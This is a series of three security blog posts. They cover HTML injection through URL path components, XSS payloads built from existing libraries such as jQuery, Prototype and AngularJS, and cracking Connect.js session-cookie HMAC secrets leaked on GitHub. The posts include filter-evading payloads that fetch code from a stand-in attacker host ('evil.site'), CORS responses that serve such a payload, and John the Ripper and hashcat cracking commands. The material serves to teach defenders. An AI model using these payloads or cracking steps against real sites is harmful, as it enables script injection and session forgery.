• Trail Ends

    URLs guide us through the trails among web apps. We follow their components – schemes, hosts, ports, querystrings – like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.

    And developers must recognize how those crumbs lure dangerous beasts to their sites.

    The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (aka cross-site scripting) payloads into querystring parameters.

    But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

    A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

    <link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

    There’s no querystring parameter to test, but there’s still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.
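    That kind of internal decomposition can be sketched in code. The function below is hypothetical (the parameter names o and foo come from the example above, not from any real app); real sites do this with mod_rewrite rules or framework routing.

```javascript
// Hypothetical sketch of a rewrite that turns ostensible path
// components into querystring name/value pairs, mirroring the
// example mapping above.
function rewritePath(path) {
  const m = path.match(/^(\/[a-z]{2}\/dir)\/o\/([^/]+)\/([^/]+)$/);
  if (!m) return path; // not a candidate for rewriting
  return m[1] + '?o=' + m[2] + '&foo=' + m[3];
}

// rewritePath('/en/dir/o/80/loch') yields '/en/dir?o=80&foo=loch'
```

    Anything injected into the path lands in those parameter values, which is why path components deserve the same suspicion as querystrings.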

    We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

    https://web.site/en/dir/o/80/loch"onmouseover=alert(9);"
    The app neglects to filter the payload, although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

    <link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

    However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page, a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

    <div class="list" onclick="Culture.save(event);" > <a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a> </div>

    We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

    Please tell us ([email protected]) how and on which page this error occurred.

    The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.
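    The filter’s behavior implies rules like the following sketch. The function and its checks are inferred from observed behavior, not taken from the app’s actual code; note what it misses — quotes pass through, which is exactly why the attribute-breaking payload still worked.

```javascript
// Sketch of a basic URL filter inferred from the app's behavior:
// reject invalid percent-encoded/UTF-8 sequences, NULL bytes, and
// angle brackets. Quotes are notably absent from the deny list.
function looksMalicious(rawPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawPath);
  } catch (e) {
    return true; // malformed percent-encoding or invalid UTF-8
  }
  return /[<>\u0000]/.test(decoded);
}
```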

    Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity.

    Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:


    <div class="list" onclick="Culture.save(event);" > <a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a> </div>

    We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

    We could further obfuscate the payload in case some other kind of filter is present:

    https://web.site/en/dir/o/80/loch"onmouseover=$["get"]("//evil.site/");"
    https://web.site/en/dir/o/80/loch"onmouseover=$["g"%2b"et"]("htt"%2b"p://"%2b"evil.site/");"

    Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other; effective validation prevents malicious payloads from entering an app, correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.
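    The encoding half can be sketched for the double-quoted attribute context seen earlier. This is a minimal illustration of the countermeasure, not a substitute for a vetted encoding library.

```javascript
// Minimal context-specific output encoder for double-quoted HTML
// attribute values. A sketch of the countermeasure only.
function encodeForHtmlAttribute(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must run first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The earlier payload becomes inert text inside the attribute:
// encodeForHtmlAttribute('loch"onmouseover=alert(9);"')
//   yields 'loch&quot;onmouseover=alert(9);&quot;'
```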

    Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

    • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
    • Deny lists fail because developers don’t anticipate the various ways of crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

    Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app.

    Be careful, lest they eat a few along the way.

    • • •
  • Thief PHB

    In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could speak in Thieves’ Cant to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of secrecy. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

    Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester defends his treatment of certain subjects, with two notable exceptions:

    Unless it were a bloody murderer,

    Or foul felonious thief that fleec’d poor passengers,

    I never gave them condign punishment.

    Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

    Hackers code, too.

    The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the document.cookie value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

    There are two important reasons for taking advantage of DRY in a web hack:

    1. Avoid inadequate deny lists (which is really a redundant term).
    2. Leverage code that already exists.

    Keep in mind that none of the following hacks are flaws of their respective JavaScript library. The target is assumed to have an HTML injection vulnerability – our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

    For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

    angular.bind(self, alert, 9)()

    In Ember.js the payload might look like:

    Ember.run(null, alert, 9)

    The pervasive jQuery might have a string like:

    $.globalEval('alert(9)')
    And the Underscore library might be leveraged with:

    _.defer(alert, 9)

    These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.

    More importantly, these libraries provide the means to load – and execute! – JavaScript from a different origin. After all, browsers don’t really know the difference between a CDN and a malicious domain.

    The jQuery library provides a few ways to obtain code:

    $.get('//evil.site/')
    $('#selector').load('//evil.site')

    Prototype has an Ajax object. It will load and execute code from a call like:

    new Ajax.Request('//evil.site/')

    But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.

    In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call https://web.site/xss_vuln.page.

    OPTIONS https://evil.site/ HTTP/1.1
    Host: evil.site
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Origin: https://web.site
    Access-Control-Request-Method: POST
    Access-Control-Request-Headers: x-prototype-version,x-requested-with
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
    Content-length: 0

    As someone with influence over the content served by evil.site, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

    HTTP/1.1 200 OK
    Date: Tue, 27 Aug 2013 05:05:08 GMT
    Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
    Access-Control-Allow-Origin: https://web.site
    Access-Control-Allow-Methods: GET, POST
    Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
    Access-Control-Expose-Headers: x-json
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8

    With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom X- headers.)

    POST https://evil.site/HWA/ch2/cors_payload.php HTTP/1.1
    Host: evil.site
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    Accept-Language: en-US,en;q=0.5
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.7.1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: https://web.site/HWA/ch2/prototype_xss.php
    Content-Length: 0
    Origin: https://web.site
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.

    HTTP/1.1 200 OK
    Date: Tue, 27 Aug 2013 05:05:08 GMT
    Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
    X-Powered-By: PHP/5.3.26
    Access-Control-Allow-Origin: https://web.site
    Access-Control-Allow-Methods: GET, POST
    Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
    Access-Control-Expose-Headers: x-json
    Access-Control-Max-Age: 86400
    Content-Length: 10
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: application/javascript; charset=utf-8

    Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.

    Find/Remove Traps

    It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That’s not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content. Nevertheless, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% chance to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.

    And the price for failure? Well, it turns out condign punishment has its own API.

    • • •
  • No Trespassing

    Oh, the secrets you’ll know if to GitHub you go. The phrases committed by coders exhibited a mistaken sense of security.

    A password ensures, while its secrecy endures, a measure of proven identity.

    Share that short phrase for the public to gaze at repositories open and clear. Then don’t be surprised at the attacker disguised with the secrets you thought were unknown.


    It’s no secret that I gave a BlackHat presentation a few weeks ago. It’s no secret that the CSRF countermeasure we proposed avoids nonces, random numbers, and secrets. It’s no secret that GitHub is a repository of secrets.

    And that’s how I got side-tracked for two days hunting secrets on GitHub when I should have been working on slides.

    Your Secret

    Security that relies on secrets (like passwords) fundamentally relies on the preservation of that secret. There’s no hidden wisdom behind that truism, no subtle paradox to grant it the standing of a koan. It’s a simple statement too often ignored, bent, and otherwise abused.

    It started with research on examples of CSRF token implementations. But the hunt soon diverged from queries for connect.sid to tokens like OAUTH_CONSUMER_SECRET, to ssh:// and mongodb:// schemes. Such beasts of the wild had been noticed – they tend to roam with little hindrance.

    connect.sid extension:js

    Sometimes these beasts leap from cover into the territory of plaintext. Sometimes they remain camouflaged behind hashes and ciphers. Crypto functions conceal the nature of a beast, but the patient hunter will be able to discover it given time.

    The mechanisms used to protect secrets, such as encryption and hash functions, are intended to maximize an attacker’s effort at trying to reverse-engineer the secret. The choice of hash function has no appreciable effect on a dictionary-based brute force attack (at least not until your dictionary or a hybrid-based approach reaches the size of the target keyspace). In the long run of an exhaustive brute force search, a “bigger” hash like SHA-512 would take longer than SHA-256 or MD5. But that’s not the smart way to increase the attacker’s work factor.

    Iterated hashing techniques are more effective at increasing the attacker’s work factor. Such techniques have a tunable property that may be adjusted with regard to the expected cracking speeds of an attacker. For example, in the PBKDF2 algorithm, both the HMAC algorithm and number of rounds can be changed, so an HMAC-SHA1 could be replaced by HMAC-SHA256 and 1,000 rounds could be increased to 10,000. (The changes would not be compatible with each other, so you would still need a migration plan when moving from one setting to another.)

    Of course, the choice of work factor must be balanced against the load you’re willing to place on the site. “Nonce” events for something like CSRF are far more frequent than “hash” events for authentication. For example, a user may authenticate once in a one-hour period, but visit dozens of pages during that same time.

    Our Secret

    But none of that matters if you’re relying on a secret that’s easy to guess, like default passwords. And it doesn’t matter if you’ve chosen a nice, long passphrase that doesn’t appear in any dictionary if you’ve checked that password into a public source code repository.

    In honor of the password cracking chapter of the upcoming AHTK 4th Edition, we’ll briefly cover how to guess HMAC values.

    We’ll use the Connect JavaScript library for Node.js as a target for this guesswork. It contains a CSRF countermeasure that relies on nonces generated via an HMAC. This doesn’t mean Connect.js implements the HMAC algorithm incorrectly or contains a design error. It just means that the security of an HMAC relies on the secrecy of its password.

    Here’s a snippet of the Connect.js code in action. Note the default secret, keyboard cat.

    ...
    var app = connect()
      .use(connect.session({ secret: 'keyboard cat' }))

    If you come across a web app that sets a connect.sess or connect.sid cookie, then it’s likely to have been created by this library. And it’s just as likely to be using a bad password for the HMAC. Let’s put that to the test with the following cookies.

    Set-Cookie: connect.sess=s%3AGY4Xp1AWB5PVzYHCANaXHznO.
    PUvao3Y6%2FXxLAG%2Bp4xQEBAcbqMCJPACQUvS2WCfsmKU; Path=/;
    Expires=Fri, 28 Jun 2013 23:13:52 GMT; HttpOnly
    Set-Cookie: connect.sid=s%3ATdF%2FriiKHfdilCTc4W5uAAhy.
    qTtH9ZL5pxgClGbZ0I0E3efJTrdC0jia6YxFh3cWKrU; path=/;
    expires=Fri, 28 Jun 2013 22:51:58 GMT; httpOnly
    Set-Cookie: connect.sid=CJVZnS56R6NY8kenBhhIOq0h.
    0opeJzAPZ3efz0dw5YJrGqVv4Fi%2BWVIThEsGHMRqDw0; Path=/; HttpOnly

    Everyone’s Secret

    John the Ripper is a venerable password guessing tool with ancient roots in the security community. Its rule-based guessing techniques and speed make it a powerful tool for cracking passwords. In this case, we’re just interested in its ability to target the HMAC-SHA256 algorithm.

    First, we need to reformat the cookies into a string that John recognizes. For these cookies, resolve the percent-encoded characters and replace the dot (.) that separates the session value from its signature with a hash (#). Some of the cookies contained a JSON-encoded version of the session value; others contained only the session value.
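    The reformatting step can be sketched as a small helper. Dropping the s: prefix that marks a signed value is an assumption about what John should treat as the salt.

```javascript
// Sketch of the reformatting step: percent-decode the cookie value,
// drop the 's:' signed-value prefix when present (an assumption about
// the salt John expects), and swap the value/signature dot for '#'.
function toJohnFormat(cookieValue) {
  let decoded = decodeURIComponent(cookieValue);
  if (decoded.startsWith('s:')) {
    decoded = decoded.slice(2);
  }
  const dot = decoded.lastIndexOf('.');
  return decoded.slice(0, dot) + '#' + decoded.slice(dot + 1);
}

// toJohnFormat('s%3ATdF%2FriiKHfdilCTc4W5uAAhy.qTtH9ZL5pxgClGbZ0I0E3efJTrdC0jia6YxFh3cWKrU')
// yields 'TdF/riiKHfdilCTc4W5uAAhy#qTtH9ZL5pxgClGbZ0I0E3efJTrdC0jia6YxFh3cWKrU'
```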


    Next, we unleash John against it. The first step might use a dictionary, such as a words.txt file you might have lying around. (The book covers more techniques and clever use of rules to target password patterns. John’s own documentation can also get you started.)

    $ ./john --format=hmac-sha256 --wordlist=words.txt sids.john

    Review your successes with the --show option.

    $ ./john --show sids.john

    Hashcat is another password guessing tool. It takes advantage of GPUs to achieve much higher guess rates. It requires a slightly different format for the HMAC-SHA256 input file: the order of the signature and salt is reversed from John’s, and they’re separated by a colon.


    Hashcat uses numeric references to the algorithms it supports. The following command runs a dictionary attack against hash algorithm 1450, which is HMAC-SHA256.

    $ ./hashcat-cli64.app -a 0 -m 1450 sids.hashcat words.txt

    Review your successes with the --show option.

    $ ./hashcat-cli64.app --show -a 0 -m 1450 sids.hashcat words.txt

    All sorts of secrets lurk in GitHub. Of course, the fundamental problem is that they shouldn’t be there in the first place. There are many more types of secrets than hashed passphrases, too.

    • • •